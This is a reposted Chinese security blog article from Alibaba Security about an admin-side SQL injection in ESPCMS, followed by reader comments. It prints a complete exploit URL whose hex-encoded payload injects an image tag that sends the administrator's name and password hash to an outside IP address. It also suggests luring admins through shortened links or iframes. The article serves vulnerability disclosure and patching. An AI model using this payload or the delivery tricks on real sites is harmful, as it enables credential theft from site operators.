CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

espcms

2017年5月23日 952点热度 0人点赞 0条评论

espcms

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

看似鸡肋的ESPCMS后台注入,其实可以很好玩

阿里安全2015-12-28共155129人围观 ,发现 14 个不明物体漏洞

0×00 背景介绍

昨日,乌云漏洞平台公开了一个ESPCMS的注入漏洞,阿里云计算安全攻防对抗团队的小伙伴第一时间对漏洞做了一个影响评估。没想到需要登录到后台才可以注入,怪不得连厂商都主动忽略了该漏洞,一定是觉得利用成本比较高,难以造成更大的危害。

0×01 复现

抱着实事求是的心态,我们在测试环境搭建了一个ESPCMS尝试进行复现,从漏洞提交者的细节中可以看到,漏洞位于adminsoft\control\citylist.php内22行附近的一处整形注入,漏洞利用成功,会返回一个html页面:

可控的字符串出现在了html页面,没有经过加盐的MD5赤果果的回显出来,看似漏洞的危害也就局限于此。

0×02 新玩法

实际上这里我们可以使用SQL注入去构造一个“反射XSS”。实现了当管理员在登陆状态下点击黑客构造好的URL,后台密码就会发送到一个黑客指定的网站。

最终构造出的exp:

http://example.com/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(0x3c696d67207372633d22687474703a2f2f3135332e39322e34312e33312f312e7068703f613d,name,0x7c,password,0x22),4,5 FROM espcms_v6.espcms_admin_member

访问一下,页面中的源代码变成了下面这样:

抓包查看网络请求,管理员的账号密码已经被发送到了三方网站。

为了更好的伪装payload,可以把地址缩成一个短网址,发送给管理员邮箱并诱使他点击,或者还可以使用iframe嵌入到管理员经常访问的网站,姜太公钓鱼愿者上钩。

0×03 修复

由于官方忽略了该漏洞,也没有给出相应的修复方案,因此所有使用ESPCMS的网站都受漏洞影响。在团队小伙伴的努力之下,目前云盾“补丁管理”已率先推出针对该漏洞的自研修复补丁。阿里云用户可登录云盾控制台,访问“补丁管理”页面点击“立即修复”按钮,即可一键完成修复。

* 作者:阿里安全(企业账号),转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

阿里安全

阿里安全28 篇文章等级: 5级
|
|
  • 上一篇:OLEOutlook利用:一封邮件绕过所有企业安全防控
  • 下一篇:2015年数据库漏洞威胁报告

这些评论亮了

  • hahah回复
    你是来教如何黑网站的对吗?大黑客
    )14(亮了
发表评论

已有 14 条评论

  • hahah 2015-12-28回复1楼

    你是来教如何黑网站的对吗?大黑客

    亮了(14)
  • 阿里云安全 2015-12-28回复2楼

    云盾攻防对抗团队发现了利用该漏洞的新姿势,并已研制出漏洞补丁,使用云盾补丁管理可一键修复该漏洞。

    亮了(3)
  • phithon (4级)一个想当文人的黑客~ 2015-12-28回复3楼

    还是比较有意思的点,赞一个

    亮了(1)
  • cone (1级) 2015-12-28回复4楼

    有意思..

    亮了(0)
  • softbug (7级)011101000110100001100001011011... 2015-12-28回复5楼

    一句话能说清楚的东西,用了几段话来描述,见鬼了

    亮了(4)
  • Black-Hole (6级)FreeBuf专栏作者 2015-12-28回复6楼

    一句话的事= =

    亮了(2)
  • lzh (2级) 2015-12-28回复7楼

    感觉是霄胸的手笔

    亮了(1)
  • 乐 乐 (2级) 2015-12-29回复8楼

    前提是需要找到一个xss

    亮了(2)
    • yichin 2015-12-29回复

      @ 乐 乐  并不需要,直接在sql执行结果里xss

      亮了(0)
  • 呵呵,第一次吐槽 2015-12-29回复9楼

    一些老东西,老思想,一段时间没人提起,重新拿起来就又是一种新姿势?

    亮了(0)
    • 哈哈 2015-12-29回复

      @ 呵呵,第一次吐槽 哈哈哈,3年前测试的东西 http://k1p4ss.sinaapp.com/?p=112

      亮了(0)
  • test 2015-12-29回复10楼

    阿里你发这出来真的是找喷的,这都可以UNION了 当然可以控制返回的一些字符串了,能控制返回字符串当然能写个XSS了,我真服了,还IMG,直接script也照样。这叫新方法?找喷的呢。

    亮了(0)
  • Lcys (1级) 2015-12-30回复11楼

    额….

    亮了(0)
  • xxxx 2016-01-04回复12楼

    一点都不亲爱的

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

阿里安全

阿里安全

阿里巴巴集团安全应急响应中心

28 篇文章1 条评论

相关阅读

  • Chrome浏览器0day使得数百万安卓设备遭受远程威胁
  • 漏洞预警:Spring Boot框架表达式注入漏洞
  • 数据监控跟踪网站PwnedList将因安全问题关闭
  • Web安全测试中常见逻辑漏洞解析(实战篇)
  • 物联网设备已沦陷,咖啡机也不能例外

特别推荐

关注我们 分享每日精选文章

不容错过

  • 黑客是如何“一键”盗取汽车的?(附演示视频)饭团君2016-05-09
  • Windows 10新变化:系统自动更新将“强制化”,用户不再可选dawner2015-07-20
  • Bash漏洞再次演进:缓冲区溢出导致远程任意命令执行xia0k2014-09-29
  • 漏洞盒子:苏宁项目榜单公布,iPhone6花落谁家FB客服2014-10-10

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me